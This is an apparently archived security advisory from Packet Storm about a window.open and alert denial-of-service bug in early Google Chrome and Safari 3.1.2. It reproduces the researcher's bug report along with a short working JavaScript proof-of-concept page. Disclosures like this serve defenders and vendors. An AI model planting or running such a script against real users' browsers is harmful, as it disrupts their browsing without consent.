Google Chrome version 0.2.149.30 and Safari version 3.1.2 suffer from a denial of service vulnerability.
531e1a8480c236fc4e23ac372b18f3494acdb457c7aad25a7c490e7f83db8d65#####################################
Google Chrome and Safari for windows
Window.open & alert DoS
#####################################
reported here => http://code.google.com/p/chromium/issues/detail?id=2966
Product Version : 0.2.149.30 (2200)
URLs (if applicable) :
Other browsers tested:
Add OK or FAIL after other browsers where you have tested this issue:
Safari 3.1.2: FAIL
Firefox 3: OK
IE 7: OK
What steps will reproduce the problem?
1. Open a Malicious page with evil script code
What is the expected result?
Chrome open one window and show one alert.
What happens instead?
Chrome open all time a new window wen the users click in OK
from alert...
Please provide any additional information below. Attach a screenshot if
possible.
##########################
Evil Page with Javascript
##########################
<html>
<head></head>
<title> Chrome Window.open & alert DoS</title>
<body>
<script>
DMK = window.open(location.reload('http://lostmon.blogspot.com'));
DMK.alert(DMK)
</script>
</body>
</html>
##################€nd##############
--
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed